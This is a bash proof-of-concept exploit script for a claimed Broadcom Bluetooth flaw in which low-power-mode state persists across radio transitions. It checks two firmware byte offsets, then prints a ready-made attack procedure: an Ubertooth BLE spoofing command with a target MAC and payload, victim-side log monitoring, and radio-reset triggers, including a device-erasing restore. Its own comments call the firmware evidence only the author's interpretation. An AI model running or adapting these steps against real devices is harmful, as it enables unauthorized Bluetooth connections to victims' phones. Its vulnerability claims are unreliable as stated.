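#!/bin/bash
# BCM_PERSIST Proof-of-Concept Exploit
# Tests LPM state persistence across radio state transitions
#
# What this script actually does: it pattern-matches two offsets in a locally
# supplied firmware dump (SoC_RAM.bin in the cwd, or the path given as $1) and
# then prints the manual test procedure the author documented. It takes no
# action against any device itself. A byte-pattern hit is only the author's
# interpretation of those bytes, not independent proof of the stated meaning.
set -euo pipefail

# Offsets and expected hex patterns exactly as the original author gave them.
readonly RSSI_TABLE_OFFSET=$((0x190340))
readonly RSSI_TABLE_PATTERN="000004c0b5000000"
readonly FLCF_REG_OFFSET=$((0x0cdd30))
readonly FLCF_REG_PATTERN="01002400"

#######################################
# Emit COUNT bytes of FILE starting at OFFSET as one contiguous lowercase hex
# string. Uses od instead of xxd because xxd ships with vim and is frequently
# absent; -v keeps od from collapsing repeated lines into "*".
# Arguments: $1 file, $2 byte offset (decimal), $3 byte count
# Outputs:   hex string on stdout (shorter than 2*COUNT chars if the file ends
#            early, empty if nothing could be read)
#######################################
hex_at() {
  local file=$1 offset=$2 count=$3
  dd if="$file" bs=1 skip="$offset" count="$count" 2>/dev/null \
    | od -An -v -tx1 \
    | tr -d ' \n'
}

#######################################
# Test whether the expected hex pattern appears in the bytes read at OFFSET.
# The size check replaces the original's silent dd failure: a dump shorter
# than the offset is reported instead of being treated as "pattern absent".
# Arguments: $1 file, $2 byte offset, $3 byte count, $4 expected hex pattern
# Outputs:   a diagnostic on stdout when the file does not reach OFFSET
# Returns:   0 if the pattern is a substring of the bytes read, 1 otherwise
#######################################
pattern_present() {
  local file=$1 offset=$2 count=$3 expected=$4
  local size hex
  size=$(wc -c < "$file") || return 1
  if (( size <= offset )); then
    printf ' [!] %s is only %s bytes; offset 0x%x not present\n' \
      "$file" "$size" "$offset"
    return 1
  fi
  hex=$(hex_at "$file" "$offset" "$count")
  # Substring match, like the original grep -q, but without a regex or a
  # pipeline that grep -q can close early under pipefail.
  [[ "$hex" == *"$expected"* ]]
}

#######################################
# Step 1: check the two offsets in the firmware dump and report hits.
# Arguments: $1 path to the dump
# Outputs:   progress and CONFIRMED lines on stdout
#######################################
verify_firmware() {
  local dump=$1
  echo "[1] Verifying firmware offsets..."
  if [[ -f "$dump" ]]; then
    echo " [+] Checking LPM RSSI table at 0x190340"
    if pattern_present "$dump" "$RSSI_TABLE_OFFSET" 16 "$RSSI_TABLE_PATTERN"; then
      echo " [+] CONFIRMED: RSSI 0xB5 (-75 dBm) in LPM table"
    fi
    echo " [+] Checking FL/CF registers at 0x0cdd30"
    if pattern_present "$dump" "$FLCF_REG_OFFSET" 4 "$FLCF_REG_PATTERN"; then
      echo " [+] CONFIRMED: FL=0x01 (UNAUTH), CF=0x24 (BTPipe+iWiFi)"
    fi
  else
    # Names the path actually looked for; the original hard-coded SoC_RAM.bin.
    printf ' [!] %s not found - firmware verification skipped\n' "$dump"
  fi
}

#######################################
# Steps 2-5: print the author's manual procedure verbatim. Nothing here is
# executed; the quoted delimiter keeps the text literal.
# Outputs:   the procedure text on stdout
#######################################
print_procedure() {
  cat <<'EOF'

[2] Configuring BLE attack device...
 Target MAC: 00:1f:f3:fb:80:df
 AdvD Payload: 4c000719010f2021568f0140e42dc8ca2adbffe681e4b14d5fd6840

 Run on Ubertooth:
 ubertooth-btle -t -A 37,38,39 -d 001ff3fb80df \
 -p 4c000719010f2021568f0140e42dc8ca2adbffe681e4b14d5fd6840

[3] Monitoring for exploitation...
 On victim device, run:
 log stream --predicate 'eventMessage CONTAINS "6D810001" OR eventMessage CONTAINS "FL 0x1"' &

[4] Trigger radio state transition...
 Method A (DFU restore - most reliable):
 idevicerestore --latest --erase device.ipsw

 Method B (Radio disable/enable):
 Settings → General → Reset → Reset Network Settings

 Method C (Power cycle):
 Force reboot device while BLE broadcaster active

[5] Post-transition verification checklist:
 [ ] CID 0x6D810001 appears in logs (within 5 sec)
 [ ] FL 0x1 < Unauth > flag present
 [ ] CF 0x24 < iWiFi BTPipe > present
 [ ] MTU = 23 (no GATT negotiation)
 [ ] proximitycontrold PID active

[*] If all checks pass: VULNERABILITY CONFIRMED
[*] Expected timeline:
 T+0s: Radio state transition completes
 T+5s: BLE scanner resumes (LPM state NOT cleared)
 T+7s: Attacker device detected from cached config
 T+10s: Unauthenticated CompanionLink established

[!] ROOT CAUSE: BCM firmware fails to clear LPM_RAM during radio transitions
[!] This is for research/testing only. Unauthorized use is illegal.
EOF
}

#######################################
# Entry point.
# Arguments: $1 optional path to the firmware dump (default: SoC_RAM.bin)
#######################################
main() {
  local dump=${1:-SoC_RAM.bin}
  echo "[*] BCM_PERSIST PoC - Broadcom LPM State Persistence"
  echo "[*] Target: Devices with BCM4377/BCM4378/BCM4387 chipsets"
  echo ""
  verify_firmware "$dump"
  print_procedure
}

# Only run when executed, so the functions can be sourced and exercised alone.
if [[ "${BASH_SOURCE[0]}" == "$0" ]]; then
  main "$@"
fi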